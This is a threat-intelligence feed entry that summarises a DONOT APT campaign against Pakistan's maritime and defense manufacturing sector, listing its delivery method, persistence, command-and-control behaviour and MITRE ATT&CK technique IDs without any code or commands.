Today > | 1 Medium vulnerabilities   -   You can now download lists of IOCs here!

Attack On Maritime & Defense Manufacturing

Nov. 18, 2024, 9:03 p.m.

Description

The DONOT APT group has launched a campaign targeting Pakistan's manufacturing industry supporting maritime and defense sectors. The attack uses a malicious LNK file disguised as an RTF, which executes PowerShell commands to deliver a lure document and stager malware. The malware establishes persistence through scheduled tasks, communicates with command and control servers using encrypted methods, and can download additional payloads. The campaign shows evolution in tactics, including improved encryption and payload delivery methods. The attackers collect detailed system information from victims and can self-delete if instructed. This operation demonstrates the increasing sophistication of APT campaigns and the need for enhanced cybersecurity measures.

Date

Published: Nov. 15, 2024, 6:35 p.m.

Created: Nov. 15, 2024, 6:35 p.m.

Modified: Nov. 18, 2024, 9:03 p.m.

Attack Patterns

DONOT

T1053.005

T1218.011

T1059.003

T1059.001

T1071.001

T1070.004

T1105

T1027

T1041

T1566

Additional Informations

Defense

Manufacturing

Pakistan